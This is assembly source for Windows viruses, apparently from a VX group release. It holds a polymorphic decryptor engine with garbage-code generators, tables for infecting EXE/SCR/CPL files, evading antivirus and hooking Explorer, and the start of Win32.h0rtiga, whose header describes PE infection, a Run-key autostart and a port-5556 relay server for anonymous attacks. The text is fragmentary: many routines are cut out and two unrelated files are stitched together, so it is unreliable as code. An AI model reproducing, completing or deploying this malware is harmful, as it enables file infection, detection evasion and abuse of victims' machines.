;Check if we are going to use a displacement in the
;indexing mode
;============================================================
;============================================================
;Choose generator for [reg] indexing mode
;============================================================
;============================================================
;More fun?!?!
;============================================================
;============================================================
;Choose generator for [reg+imm] indexing mode
;============================================================
;============================================================
;Use magic to convert some values into
;desired instructions
;============================================================
test al,CRYPT_COMPLEX
jz ok_complex
;============================================================
;Get random displacement from current displacement
;eeehh?!?
;============================================================
mov eax,00001000h
call get_rnd_range
mov dword ptr [ebp+disp2disp],eax
call load_aux
push ebx
call GenGarbageEx
;============================================================
;Choose generator for [reg+reg+imm] indexing mode
;============================================================
push ebx
call GenGarbageEx
;============================================================
;Choose generator for [reg+reg] indexing mode
;============================================================
;============================================================
;Build decryptor instructions
;============================================================
pop ebx
;============================================================
;Restore aux reg state
;============================================================
;============================================================
;Get post-build flags
;============================================================
common_part: lodsb
;============================================================
;Insert displacement from real address?
;============================================================
test al,MAGIC_PUTDISP
jz skip_disp
push eax
mov eax,dword ptr [ebp+fake_ptr_disp]
sub eax,dword ptr [ebp+disp2disp]
neg eax
stosd
pop eax
;============================================================
;Insert key?
;============================================================
skip_key: ret
;============================================================================
;Choose a magic generator
;============================================================================
;============================================================================
;Do operand size correction
;============================================================================
size_correct: lodsb
mov ah,byte ptr [ebp+fake_oper_size]
cmp ah,01h
je store_correct
inc al
cmp ah,04h
je store_correct
mov ah,66h
xchg ah,al
stosw
ret
store_correct: stosb
ret
;============================================================================
;Load aux reg with displacement
;============================================================================
;============================================================
;Get a valid auxiliary register
;============================================================
;============================================================
;Move displacement into aux reg
;============================================================
mov al,0B8h
or al,byte ptr [ebx+REG_MASK]
stosb
pop eax
neg eax
stosd
ret
;============================================================================
;Generate push reg + garbage + pop reg
;============================================================================
call get_rnd32
test al,01h
jnz skip_sp_push
call push_with_sp
jmp short from_push
call gen_garbage
ret
;============================================================================
;Emulate a PUSH instruction, using SUB ESP,00000004h
;============================================================================
;============================================================================
;Emulate a POP instruction, using ADD ESP,00000004h
;============================================================================
;============================================================================
;Generate RET in different ways
;============================================================================
call get_valid_reg
mov al,58h
or al,byte ptr [ebx+REG_MASK]
stosb
or byte ptr [ebx+REG_FLAGS],REG_READ_ONLY
push ebx
call GenGarbageEx
pop ebx
xor byte ptr [ebx+REG_FLAGS],REG_READ_ONLY
mov ax,0E0FFh
or ah,byte ptr [ebx+REG_MASK]
stosw
ret
;============================================================================
;Generate CALL without return
;============================================================================
call get_rnd32
test al,01h
jz pop_with_sp
call get_valid_reg
mov al,58h
or al,byte ptr [ebx+REG_MASK]
stosb
call gen_garbage
ret
;============================================================================
;Generate unconditional jumps
;============================================================================
;============================================================================
;Generate conditional jumps
;============================================================================
;============================================================================
;Generate MOV [mem],reg
;============================================================================
ret
;============================================================================
;Generate clc/stc/cmc/cld/std
;============================================================================
;============================================================================
;Generate fake decrypt instructions
;============================================================================
call get_rnd32
call get_rnd_range
inc eax
neg eax
ok_fake_disp: mov dword ptr [ebp+fake_ptr_disp],eax
pop edx
add eax,edx
push eax
call get_valid_reg
push ebx
call GenGarbageEx ;Garbage
call fake_or_not
call GenGarbageEx ;Garbage
pop ebx
pop eax
mov byte ptr [ebp+fake_oper_size],al
shr eax,08h
mov byte ptr [ebp+fake_index_mask],ah
mov byte ptr [ebp+fake_build_flags],al
pop dword ptr [ebp+fake_crypt_key]
pop dword ptr [ebp+fake_ptr_disp]
bad_fake_size: ret
;============================================================================
;Get a random reg
;============================================================================
;============================================================================
;Get a random reg (avoid REG_READ_ONLY, REG_IS_COUNTER and REG_IS_INDEX)
;============================================================================
;============================================================================
;Load ecx with crypt_size / oper_size
;============================================================================
;============================================================================
;Generate polymorphic decryptor... What's new in this poly engine?
;
;On entry:
; esi -> Pointer to code
; edi -> Where to generate polymorphic decryptor
; ecx -> Size of area to encrypt
; edx -> Entry point to code once decrypted
;On exit:
; ecx -> Decryptor size
; edi -> End of decryptor
;
;============================================================================
xor eax,eax
mov byte ptr [ebp+NumberOfDataAreas],al ;Clear # of data areas
mov byte ptr [ebp+recursive_level],al ;Clear recursive
mov ecx,NUM_DA
lea edi,dword ptr [ebp+tbl_data_area] ;Init data areas
loop_init_da: stosd
stosd
loop loop_init_da
call get_valid_reg
mov al,byte ptr [ebx+REG_MASK]
mov byte ptr [ebp+index_mask],al
or byte ptr [ebx+REG_FLAGS],REG_IS_INDEX
xor eax,eax
mov ecx,00000005h
lea edi,dword ptr [ebp+style_table+00000004h]
clear_style: stosd
add edi,00000004h
loop clear_style
call get_valid_reg
mov al,byte ptr [ebx+REG_MASK]
mov byte ptr [ebp+counter_mask],al
or byte ptr [ebx+REG_FLAGS],REG_IS_COUNTER
call get_rnd32
and eax,00000001h
jz ok_disp
call get_rnd32
ok_disp: mov dword ptr [ebp+ptr_disp],eax
call get_rnd32
mov dword ptr [ebp+crypt_key],eax
call get_rnd32
mov byte ptr [ebp+build_flags],al
call get_rnd32
and al,03h
cmp al,01h
je get_size_ok
cmp al,02h
je get_size_ok
inc al
get_size_ok: mov byte ptr [ebp+oper_size],al
mov edi,dword ptr [ebp+PtrToDecrypt];Ptr to decryptor
call gen_ret
call gen_rnd_block
;============================================================
;If this is the 1st decryptor we need to save
;some regs
;============================================================
mov al,REG_READ_ONLY
mov ecx,00000004h
lea esi,dword ptr [ebp+PshPStepIndex]
DoRestorePush: push ecx
push esi
call GenInitGarbage
pop esi
lodsd
lea edx,dword ptr [ebp+eax+TblDoPush]
mov al,byte ptr [edx]
stosb
mov dl,not REG_READ_ONLY
TryToFixEBX: cmp al,053h
jne TryToFixESI
loop DoRestorePush
;============================================================
;Build the JZ/JNZ instruction (at the end of the decryptor
;loop) at runtime
;============================================================
push ebx
call GenGarbageEx
mov dword ptr [ebp+XrndFixPtr],edi
add edi,00000006h
call gen_garbage
pop ebx
call gen_garbage
;============================================================
;Generate CALLs to each routine inside garbage code
;============================================================
call get_rnd32
and al,01h
jz MutateCall
pop ebx
push edi
sub edi,dword ptr [ebp+PtrToDecrypt]
push edi
pop ecx
pop edi
ret
;============================================================================
;Poly engine initialized data
;============================================================================
;============================================================
;Register table
;
; 00h -> BYTE -> Register mask
; 01h -> BYTE -> Register flags
;============================================================
tbl_regs equ $
db 00000000b,REG_READ_ONLY ;eax
tbl_reg_ebx db 00000011b,00h ;ebx
db 00000001b,00h ;ecx
db 00000010b,00h ;edx
tbl_reg_esi db 00000110b,REG_NO_8BIT ;esi
tbl_reg_edi db 00000111b,REG_NO_8BIT ;edi
tbl_reg_ebp db 00000101b,REG_NO_8BIT ;ebp
end_regs equ $
;============================================================
;Aliases for reg table structure
;============================================================
;============================================================
;Bit aliases for reg flags
;============================================================
;============================================================
;Initial reg flags
;============================================================
tbl_startup equ $
db REG_READ_ONLY ;eax
db 00h ;ebx
db 00h ;ecx
db 00h ;edx
db REG_NO_8BIT ;esi
db REG_NO_8BIT ;edi
db REG_NO_8BIT ;ebp
;============================================================
;Code that does not disturb reg values
;============================================================
tbl_save_code equ $
clc
stc
cmc
cld
std
end_save_code equ $
;============================================================
;Generators for [reg] indexing mode
;============================================================
tbl_idx_reg equ $
dd offset xx_inc_reg
dd offset xx_dec_reg
dd offset xx_not_reg
dd offset xx_add_reg
dd offset xx_sub_reg
dd offset xx_xor_reg
;============================================================
;Generators for [reg+imm] indexing mode
;============================================================
tbl_dis_reg equ $
dd offset yy_inc_reg
dd offset yy_dec_reg
dd offset yy_not_reg
dd offset yy_add_reg
dd offset yy_sub_reg
dd offset yy_xor_reg
;============================================================
;Generators for [reg+reg] indexing mode
;============================================================
tbl_xtended equ $
dd offset zz_inc_reg
dd offset zz_dec_reg
dd offset zz_not_reg
dd offset zz_add_reg
dd offset zz_sub_reg
dd offset zz_xor_reg
;============================================================
;Generators for [reg+reg+imm] indexing mode
;============================================================
tbl_paranoia equ $
dd offset ii_inc_reg
dd offset ii_dec_reg
dd offset ii_not_reg
dd offset ii_add_reg
dd offset ii_sub_reg
dd offset ii_xor_reg
;============================================================
;Opcodes for math reg,imm
;============================================================
tbl_math_imm equ $
db 0C0h ;add
db 0C8h ;or
db 0E0h ;and
db 0E8h ;sub
db 0F0h ;xor
db 0D0h ;adc
db 0D8h ;sbb
end_math_imm equ $
;============================================================
;Magic aliases
;============================================================
;============================================================
;Magic data
;============================================================
xx_inc_reg db 0FEh
db MAGIC_CAREEBP
db 00h
db 00h
dd offset x_inc_reg_byte
dd offset x_inc_reg_word
dd offset x_inc_reg_dword
xx_dec_reg db 0FEh
db MAGIC_CAREEBP
db 08h
db 00h
dd offset x_dec_reg_byte
dd offset x_dec_reg_word
dd offset x_dec_reg_dword
xx_not_reg db 0F6h
db MAGIC_CAREEBP
db 10h
db 00h
dd offset x_not_reg_byte
dd offset x_not_reg_word
dd offset x_not_reg_dword
xx_add_reg db 80h
db MAGIC_CAREEBP
db 00h
db MAGIC_PUTKEY
dd offset x_add_reg_byte
dd offset x_add_reg_word
dd offset x_add_reg_dword
xx_sub_reg db 80h
db MAGIC_CAREEBP
db 28h
db MAGIC_PUTKEY
dd offset x_sub_reg_byte
dd offset x_sub_reg_word
dd offset x_sub_reg_dword
xx_xor_reg db 80h
db MAGIC_CAREEBP
db 30h
db MAGIC_PUTKEY
dd offset x_xor_reg_byte
dd offset x_xor_reg_word
dd offset x_xor_reg_dword
yy_inc_reg db 0FEh
db MAGIC_NOTEBP
db 80h
db MAGIC_PUTDISP
dd offset x_inc_reg_byte
dd offset x_inc_reg_word
dd offset x_inc_reg_dword
yy_dec_reg db 0FEh
db MAGIC_NOTEBP
db 88h
db MAGIC_PUTDISP
dd offset x_dec_reg_byte
dd offset x_dec_reg_word
dd offset x_dec_reg_dword
yy_not_reg db 0F6h
db MAGIC_NOTEBP
db 90h
db MAGIC_PUTDISP
dd offset x_not_reg_byte
dd offset x_not_reg_word
dd offset x_not_reg_dword
yy_add_reg db 80h
db MAGIC_NOTEBP
db 80h
db MAGIC_PUTKEY or MAGIC_PUTDISP
dd offset x_add_reg_byte
dd offset x_add_reg_word
dd offset x_add_reg_dword
yy_sub_reg db 80h
db MAGIC_NOTEBP
db 0A8h
db MAGIC_PUTKEY or MAGIC_PUTDISP
dd offset x_sub_reg_byte
dd offset x_sub_reg_word
dd offset x_sub_reg_dword
yy_xor_reg db 80h
db MAGIC_NOTEBP
db 0B0h
db MAGIC_PUTKEY or MAGIC_PUTDISP
dd offset x_xor_reg_byte
dd offset x_xor_reg_word
dd offset x_xor_reg_dword
zz_inc_reg db 0FEh
db MAGIC_CAREEBP
db 04h
db 00h
dd offset x_inc_reg_byte
dd offset x_inc_reg_word
dd offset x_inc_reg_dword
zz_dec_reg db 0FEh
db MAGIC_CAREEBP
db 0Ch
db 00h
dd offset x_dec_reg_byte
dd offset x_dec_reg_word
dd offset x_dec_reg_dword
zz_not_reg db 0F6h
db MAGIC_CAREEBP
db 14h
db 00h
dd offset x_not_reg_byte
dd offset x_not_reg_word
dd offset x_not_reg_dword
zz_add_reg db 80h
db MAGIC_CAREEBP
db 04h
db MAGIC_PUTKEY
dd offset x_add_reg_byte
dd offset x_add_reg_word
dd offset x_add_reg_dword
zz_sub_reg db 80h
db MAGIC_CAREEBP
db 2Ch
db MAGIC_PUTKEY
dd offset x_sub_reg_byte
dd offset x_sub_reg_word
dd offset x_sub_reg_dword
zz_xor_reg db 80h
db MAGIC_CAREEBP
db 34h
db MAGIC_PUTKEY
dd offset x_xor_reg_byte
dd offset x_xor_reg_word
dd offset x_xor_reg_dword
ii_inc_reg db 0FEh
db MAGIC_NOTEBP
db 84h
db MAGIC_PUTDISP
dd offset x_inc_reg_byte
dd offset x_inc_reg_word
dd offset x_inc_reg_dword
ii_dec_reg db 0FEh
db MAGIC_NOTEBP
db 8Ch
db MAGIC_PUTDISP
dd offset x_dec_reg_byte
dd offset x_dec_reg_word
dd offset x_dec_reg_dword
ii_not_reg db 0F6h
db MAGIC_NOTEBP
db 94h
db MAGIC_PUTDISP
dd offset x_not_reg_byte
dd offset x_not_reg_word
dd offset x_not_reg_dword
ii_add_reg db 80h
db MAGIC_NOTEBP
db 84h
db MAGIC_PUTKEY or MAGIC_PUTDISP
dd offset x_add_reg_byte
dd offset x_add_reg_word
dd offset x_add_reg_dword
ii_sub_reg db 80h
db MAGIC_NOTEBP
db 0ACh
db MAGIC_PUTKEY or MAGIC_PUTDISP
dd offset x_sub_reg_byte
dd offset x_sub_reg_word
dd offset x_sub_reg_dword
ii_xor_reg db 80h
db MAGIC_NOTEBP
db 0B4h
db MAGIC_PUTKEY or MAGIC_PUTDISP
dd offset x_xor_reg_byte
dd offset x_xor_reg_word
dd offset x_xor_reg_dword
;============================================================
;Reverse-code strings
;============================================================
x_inc_reg_byte db 02h,0FEh,0C8h,MAGIC_ENDSTR
x_inc_reg_word db 02h,66h,48h,MAGIC_ENDSTR
x_inc_reg_dword db 01h,48h,MAGIC_ENDSTR
x_dec_reg_byte db 02h,0FEh,0C0h,MAGIC_ENDSTR
x_dec_reg_word db 02h,66h,40h,MAGIC_ENDSTR
x_dec_reg_dword db 01h,40h,MAGIC_ENDSTR
x_not_reg_byte db 02h,0F6h,0D0h,MAGIC_ENDSTR
x_not_reg_word db 03h,66h,0F7h,0D0h,MAGIC_ENDSTR
x_not_reg_dword db 02h,0F7h,0D0h,MAGIC_ENDSTR
x_add_reg_byte db 01h,2Ch,MAGIC_ENDKEY
x_add_reg_word db 02h,66h,2Dh,MAGIC_ENDKEY
x_add_reg_dword db 01h,2Dh,MAGIC_ENDKEY
x_sub_reg_byte db 01h,04h,MAGIC_ENDKEY
x_sub_reg_word db 02h,66h,05h,MAGIC_ENDKEY
x_sub_reg_dword db 01h,05h,MAGIC_ENDKEY
x_xor_reg_byte db 01h,34h,MAGIC_ENDKEY
x_xor_reg_word db 02h,66h,35h,MAGIC_ENDKEY
x_xor_reg_dword db 01h,35h,MAGIC_ENDKEY
;============================================================
;Format for each style-table entry:
;
; 00h -> DWORD -> Address of generator
; 04h -> DWORD -> Address of generated subroutine or
; 00000000h if not yet generated
;
;============================================================
style_table equ $
dd offset gen_load_ptr
dd 00000000h
dd offset gen_load_ctr
dd 00000000h
dd offset gen_decrypt
dd 00000000h
dd offset gen_next_step
dd 00000000h
dd offset gen_next_ctr
dd 00000000h
;============================================================
;Generators for incrementing the index register
;============================================================
tbl_idx_up equ $
dd offset IdxUpWithADD
dd offset IdxUpWithSUB
dd offset IdxUpWithINC
dd offset IdxUpADDADD
dd offset IdxUpADDSUB
dd offset IdxUpSUBSUB
dd offset IdxUpSUBADD
;============================================================
;Misc generators
;============================================================
tbl_jmp_end equ $
dd offset jmpendregadd
dd offset jmpendregsub
dd offset jmpendregxor
tbl_call_step equ $
dd offset CallStepADD
dd offset CallStepSUB
dd offset CallStepXOR
TblDoFog equ $
dd offset DoFogAdd
dd offset DoFogSub
dd offset DoFogXor
NumFog equ ($-TblDoFog)/04h
TblFixFog equ $
dd offset FixFogAdd
dd offset FixFogSub
dd offset FixFogXor
;============================================================
;Generators for decrementing the index register
;============================================================
tbl_idx_down equ $
dd offset IdxDownWithADD
dd offset IdxDownWithSUB
dd offset IdxDownWithDEC
dd offset IdxDownADDADD
dd offset IdxDownADDSUB
dd offset IdxDownSUBSUB
dd offset IdxDownSUBADD
;============================================================
;Garbage code generators
;============================================================
tbl_i_g equ $
end_i_g equ $
tbl_garbage equ $
dd offset gen_save_code ;clc stc cmc cld std
dd offset g_movreg32imm ;mov reg32,imm
dd offset g_movreg16imm ;mov reg16,imm
dd offset g_movreg8imm ;mov reg8,imm
dd offset g_xchgregreg32 ;xchg reg32,reg32
dd offset g_xchgregreg16 ;xchg reg16,reg16
dd offset g_xchgregreg8 ;xchg reg8,reg8
dd offset g_movregreg32 ;mov reg32,reg32
dd offset g_movregreg16 ;mov reg16,reg16
dd offset g_movregreg8 ;mov reg8,reg8
dd offset g_inc_reg32 ;inc reg32
dd offset g_inc_reg16 ;inc reg16
dd offset g_inc_reg8 ;inc reg8
dd offset g_dec_reg32 ;dec reg32
dd offset g_dec_reg16 ;dec reg16
dd offset g_dec_reg8 ;dec reg8
dd offset g_mathregimm32 ;math reg32,imm
dd offset g_mathregimm16 ;math reg16,imm
dd offset g_mathregimm8 ;math reg8,imm
dd offset g_movzx_movsx ;movzx/movsx reg32,reg16
save_space equ $
end_garbage equ $
;============================================================
;PolyPush
;============================================================
TblDoPush equ $
pushEBX db 053h
pushESI db 056h
pushEDI db 057h
pushEBP db 055h
;============================================================
;PolyPop
;============================================================
TblDoPop equ $
popEBX db 05Dh
popESI db 05Fh
popEDI db 05Eh
popEBP db 05Bh
;============================================================================
;CRC32 of API names
;============================================================================
CRC32_IsDebugPr dd 00000000h
CRC32_RegServProc dd 00000000h
;============================================================================
;CRC32 of infectable file extensions
;============================================================================
TblCRC32szEXT equ $
CRC32_szEXE dd 00000000h
CRC32_szSCR dd 00000000h
CRC32_szCPL dd 00000000h
;============================================================================
;CRC32 of EXPLORER.EXE and of the system DLL names (USER32, PSAPI, IMAGEHLP, SFC)
;============================================================================
CRCszEXPLORER dd 00000000h
CRCszUSER32 dd 00000000h
CRCszPSAPI dd 00000000h
CRCszIMGHLP dd 00000000h
CRCszSFC dd 00000000h
;============================================================================
;Files to avoid infecting
;============================================================================
;============================================================================
;CRC32 of AV files
;============================================================================
;============================================================================
;End of CRC32 protected area
;============================================================================
;============================================================================
;End of virus image in files
;============================================================================
;============================================================================
;Seed for random number generator
;============================================================================
rnd32_seed dd 00000000h
;============================================================================
;CRC32 lookup table
;============================================================================
;============================================================================
;KERNEL32 APIs
;============================================================================
a_GetProcAddress dd 00000000h
epK32Apis equ $
a_CreateFileA dd 00000000h
a_CreateFileMappingA dd 00000000h
a_CreateProcessA dd 00000000h
a_CreateThread dd 00000000h
a_CloseHandle dd 00000000h
a_DeleteFileA dd 00000000h
a_ExitThread dd 00000000h
a_FindClose dd 00000000h
a_FindFirstFileA dd 00000000h
a_FindNextFileA dd 00000000h
a_FreeLibrary dd 00000000h
a_GetComputerNameA dd 00000000h
a_GetCurrentProcess dd 00000000h
a_GetDriveTypeA dd 00000000h
a_GetFileAttributesA dd 00000000h
a_GetLastError dd 00000000h
a_GetLocalTime dd 00000000h
a_GetLogicalDriveStringsA dd 00000000h
a_GetSystemDirectoryA dd 00000000h
a_GetVersionEx dd 00000000h
a_LoadLibraryA dd 00000000h
a_MapViewOfFile dd 00000000h
a_OpenFileMappingA dd 00000000h
a_OpenProcess dd 00000000h
a_ReadProcessMemory dd 00000000h
a_SetEndOfFile dd 00000000h
a_SetFileAttributesA dd 00000000h
a_SetFilePointer dd 00000000h
a_SetFileTime dd 00000000h
a_Sleep dd 00000000h
a_UnmapViewOfFile dd 00000000h
a_WriteProcessMemory dd 00000000h
a_IsDebuggerPresent dd 00000000h
hKERNEL32 dd 00000000h
;============================================================================
;Used to check current computer name
;============================================================================
SizeOfComputerName dd 00000000h
;============================================================================
;Buffer used on misc routines
;============================================================================
EP_Bytes dd 00000000h
;============================================================================
;End of virus virtual image
;============================================================================
;============================================================================
;Structure used by GetVersionEx
;============================================================================
system_version equ $
dwOSVersionInfoSize dd 00000000h
dwMajorVersion dd 00000000h
dwMinorVersion dd 00000000h
dwBuildNumber dd 00000000h
dwPlatformId dd 00000000h
;============================================================================
;Variables used by the Windows 9x residency routines
;============================================================================
hSnapshot dd 00000000h
ProcessEntry equ $
ProcEdwSize dd 00000000h
ProcEcntUsage dd 00000000h
ProcEth32ProcessID dd 00000000h
ProcEth32DefaultHeapID dd 00000000h
ProcEth32ModuleID dd 00000000h
ProcEcntThreads dd 00000000h
ProcEth32ParentProcessID dd 00000000h
ProcEpcPriClassBase dd 00000000h
ProcEdwFlags dd 00000000h
ProcEszExeFile db MAX_PATH dup (00h)
ModuleEntry equ $
ModEdwSize dd 00000000h
ModEth32ModuleID dd 00000000h
ModEth32ProcessID dd 00000000h
ModEGlblcntUsage dd 00000000h
ModEProccntUsage dd 00000000h
ModEmodBaseAddr dd 00000000h
ModEmodBaseSize dd 00000000h
ModEhModule dd 00000000h
ModEszModule db MAX_MODULE_NAME32+1 dup (00h)
ModEszExePath db MAX_PATH dup (00h)
;============================================================================
;Variables used by the Windows NT and Windows 2000 residency routines
;============================================================================
hProcess dd 00000000h
hModule dd 00000000h
Explorer_MZ_lfanew dd 00000000h
Explorer_FH_SizeOfOptionalHeader dw 0000h
Explorer_FH_NumberOfSections dw 0000h
Explorer_DE_Import dd 00000000h
Explorer_Hook dd 00000000h
Explorer_Patch dd 00000000h
Explorer_Init_Hook dd 00000000h
;============================================================================
;This is the virus infection thread ID
;============================================================================
IF_ThreadID dd 00000000h
;============================================================================
;This is used to locate system DLL files and load them without using names,
;only by means of CRC32
;============================================================================
a_SDLL_CRC32 dd 00000000h
;============================================================================
;TOOLHELP APIs (Windows 9x only)
;============================================================================
epTOOLHELPApis equ $
a_CreateToolhelp32Snapshot dd 00000000h
a_Process32First dd 00000000h
a_Process32Next dd 00000000h
a_Module32First dd 00000000h
a_Module32Next dd 00000000h
;============================================================================
;PSAPI APIs (Windows NT & Windows 2000 only)
;============================================================================
epPSAPIApis equ $
a_EnumProcessModules dd 00000000h
a_EnumProcesses dd 00000000h
a_GetModuleBaseNameA dd 00000000h
a_GetModuleInformation dd 00000000h
hPSAPI dd 00000000h
;============================================================================
;IMAGEHLP APIs used to compute new image checksum
;============================================================================
epIMGHLPApis equ $
a_CheckSumMappedFile dd 00000000h
hIMGHLP dd 00000000h
;============================================================================
;SFC APIs used by the virus to avoid Windows 2000 System File Protection
;============================================================================
epSFCApis equ $
a_SfcIsFileProtected dd 00000000h
hSFC dd 00000000h
;============================================================================
;USER32 APIs (the address is of the ANSI version if the target is running
;Windows 9x, or of the Wide version if running Windows NT).
;============================================================================
epUSER32Apis equ $
a_DefWindowProc dd 00000000h
hUSER32 dd 00000000h
;============================================================================
;Handles over target files
;============================================================================
h_CreateFile dd 00000000h
h_FileMap dd 00000000h
;============================================================================
;Misc variables
;============================================================================
CurFileAttr dd 00000000h
ChecksumPE dd 00000000h
OldChecksum dd 00000000h
map_is_here dd 00000000h
FileImport dd 00000000h
ImportSH dd 00000000h
inject_offs dd 00000000h
vir_offset dd 00000000h
search_raw dd 00000000h
host_base dd 00000000h
virus_sh dd 00000000h
fix_size dd 00000000h
raw_align dd 00000000h
K32CodeStart dd 00000000h
K32CodeEnd dd 00000000h
;============================================================================
;Poly engine uninitialized data
;============================================================================
Xrnd1 dd 00000000h
XrndReg dd 00000000h
XrndFixPtr dd 00000000h
XrndMath dd 00000000h
fake_field equ $
TblStdPshP equ $
dd 00000000h
dd 00000000h
dd 00000000h
dd 00000000h
NumberOfDataAreas db 00h
;============================================================================
;SYSTEMTIME structure used by GetLocalTime
;============================================================================
local_time equ $
LT_Year dw 0000h
LT_Month dw 0000h
LT_DayOfWeek dw 0000h
LT_Day dw 0000h
LT_Hour dw 0000h
LT_Minute dw 0000h
LT_Second dw 0000h
LT_Milliseconds dw 0000h
;============================================================================
;A rect structure used in the payload
;============================================================================
WindowRect equ $
WR_left dd 00000000h
WR_top dd 00000000h
WR_right dd 00000000h
WR_bottom dd 00000000h
;============================================================================
;This is a WIN32 FindData structure used to infect files, and some
;auxiliary variables
;============================================================================
FileSizeOnDisk dd 00000000h
FatSize dd 00000000h
h_Find dd 00000000h
DirectFindData db SIZEOF_WIN32_FIND_DATA dup (00h)
;============================================================================
;Used to retrieve current, windows and system directories
;============================================================================
;============================================================================
;Used to get logical drives
;============================================================================
;============================================================================
;End of virus image in allocated memory
;============================================================================
virseg ends
end host_code
;
; Win32.h0rtiga Coded by |Zan [@deepzone.org]
;
; ©2000 DeepZone - Digital Security Center
;
; http://www.deepzone.org
;
;----------------------------------------------------------------------------
;
; Win32.Hortiga
;
;
; AVP's description
;
; - http://www.avp.ch/avpve/newexe/win32/hortiga.stm
;
; It is a non-memory-resident parasitic Win32 virus. It searches
; for PE EXE files (Windows executables), then writes itself to
; the end of the file. To reserve a place for its code the virus
; creates a new section with the ".|Zan" name at the end of the
; file.
;
; The virus has "anonymous IP" ability. That means that a hacker
; may use infected machines as a "proxy server" sending packets
; with infected machine's IP address:
;
;        IP1                         IP2                       IP3
; Hacker's machine -----> Infected machine -----> Target machine
;
; A hacker connects to the infected machine by using his IP
; address (IP1) and forces the infected machine to forward packets
; to the target machine; then the infected machine's IP address (IP2)
; is used. Using this mechanism the hacker hides his IP address.
;
; The virus installs its "anonymous" component as a stand-alone program
; using the filename SERVER.EXE. That program is created in the
; Windows system directory and registered in the auto-start registry
; key:
;
; HKLM\Software\Microsoft\Windows\CurrentVersion\Run
; h0rtiga Server = "Windir\server.exe"
;
; where "Windir" is the Windows system folder.
;
; The virus contains the text string:
;
; (c) 2000. Win9x.h0rtiga v1.0 Server activated - http://mareasvivas.cjb.net
; Coded by |Zan - izan@galaxycorp.com / izan@deepzone.org
; Who are you???
;
; This string is used as ID-text to connect to the hacker's machine
; with the server on the infected machine.
;
; -- end AVP description
;
;
; Win32.h0rtiga by |Zan
;
; h0rtiga is a simple non-resident parasite. It wasn't developed
; like a traditional virus, but it ended up infecting win32 machines.
;
; Originally it was proof-of-concept code showing win9x's risks and
; holes in a Spanish whitepaper called "Win32.h0rtiga : Anonimato e
; Intrusión".
;
; When extra code was added to patch PE files, inoculating h0rtiga code
; into arbitrary files, it became a virus ...
;
; h0rtiga infects by adding an extra section/object called ".|Zan". It
; can infect under win9x/NT/2k, but its payload only plays in win9x.
;
; This runtime infector doesn't implement "modern" features like stealth,
; encryption or polymorphism, but it does implement "classic" features like
; timestamp or file attributes.
;
; Infecting with an extra section is "hard", and it would have been
; easier to add the viral code to the last section, but I wanted a clear,
; fast and easy uninfection, so I chose the longest, most primitive and
; hardest way to implement it.
;
; h0rtiga's payload runs a single server listening on port 5556. This
; server allows full arbitrary relaying and can be handled with a generic
; h0rtiga client. Yes, that's ... now you can imagine black hats
; exploiting infected win9x machines: anonymous surfing, faking e-mails,
; bypassing IRC bans ...
;
; Code contains clear labels and a lot of EQUs and structures documenting
; viral code ...
;
;
; greetings ...
; -------------
;
; spanish sec/hack groups, ADM, beavuh, b0f, non-commercial groups ...
;
; ... and, of course VLAD & 29A
;
; I'd like to give special thanks to Bumblebee/29A (fantastic VXer).
;
; I hope that h0rtiga can be a good contribution to this fantastic 29A
; release ;)
;
;
; deep greets
; -----------
;
; ^Anuska^> If you hit one time this key we'll hack this enterprise ...
; if you hit two times we'll hack their networks ... sorry
; mouse support isn't available ;)
;
; TheWizard> Win ME is the new msoft OS version ... I hope that now it
; can handle windows ;)
;
; Nemo> next step ... mmmm ... i don't know ... hack the fix again ?
;
;
; Special greetings ...
; ---------------------
;
; Win32.h0rtiga is dedicated to Sandra ...
;
;
;----------------------------------------------------------------------------
; Win32.h0rtiga - begin virus code (w32h0rtiga.asm)
;----------------------------------------------------------------------------
;------------------------------------------------------------
;Compiler options
;------------------------------------------------------------
.386P
locals
jumps
.model flat,STDCALL
;------------------------------------------------------------
;Just to show a message on virus 1st generation
;------------------------------------------------------------
extrn MessageBoxA:PROC
extrn GetModuleHandleA:PROC
extrn ExitProcess:PROC
;----------------------------------------------------------------------------
;Data Section
;----------------------------------------------------------------------------
.data
db 0
;----------------------------------------------------------------------------
;Code Section
;----------------------------------------------------------------------------
.code
start:
;------------------------------------------------------------
;h0rtiga main
;------------------------------------------------------------
;------------------------------------------------------------
;begin h0rtiga data
;------------------------------------------------------------
FILETIME STRUC
FT_dwLowDateTime DD ?
FT_dwHighDateTime DD ?
FILETIME ENDS
WIN32_FIND_DATA STRUC
WFD_dwFileAttributes DD ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh DD ?
WFD_nFileSizeLow DD ?
WFD_dwReserved0 DD ?
WFD_dwReserved1 DD ?
WFD_szFileName DB MAX_PATH DUP (?)
WFD_szAlternateFileName DB 13 DUP (?)
DB 3 DUP (?)
WIN32_FIND_DATA ENDS
SIZEOF_WIN32_FIND_DATA EQU SIZE WIN32_FIND_DATA
INVALID_HANDLE_VALUE EQU -1
VER_PLATFORM_WIN32_WINDOWS EQU 1
_OSVERSIONINFO STRUCT
dwOSVersionInfoSize DD ?
dwMajorVersion DD ?
dwMinorVersion DD ?
dwBuildNumber DD ?
dwPlatformId DD ?
szCSDVersion DB 128 DUP (?)
_OSVERSIONINFO ENDS
sz_mGetProcAddr db 'GetProcAddress', 0
ddGetProcAddress dd ?
sz_mLoadLibraryA db 'LoadLibraryA', 0
ddLoadLibraryA dd ?
kernel dd ?
Counter dw ?
AddressTableVA dd ?
OrdinalTableVA dd ?
NumAPISK32 equ 21
sz_mKernel32 db 'KERNEL32', 0
TablaK32 db 'ExitProcess', 0
db 'GetVersionExA', 0
db 'FindFirstFileA', 0
db 'FindNextFileA', 0
db 'FindClose', 0
db 'CreateFileA', 0
db 'CreateFileMappingA', 0
db 'MapViewOfFile', 0
db 'UnmapViewOfFile', 0
db 'CloseHandle', 0
db 'SetFileAttributesA', 0
db 'SetFileTime', 0
db 'GetModuleHandleA', 0
db 'GetCommandLineA', 0
db 'GetSystemDirectoryA', 0
db 'ReadFile', 0
db 'WriteFile', 0
db 'SetFilePointer', 0
db 'GetCurrentProcessId', 0
db 'RegisterServiceProcess', 0
db 'GlobalAlloc', 0
addr_apis:
ddExitProcess dd ?
ddGetVersionExA dd ?
ddFindFirstFileA dd ?
ddFindNextFileA dd ?
ddFindClose dd ?
ddCreateFileA dd ?
ddCreateFileMappingA dd ?
ddMapViewOfFile dd ?
ddUnmapViewOfFile dd ?
ddCloseHandle dd ?
ddSetFileAttributesA dd ?
ddSetFileTime dd ?
ddGetModuleHandleA dd ?
ddGetCommandLineA dd ?
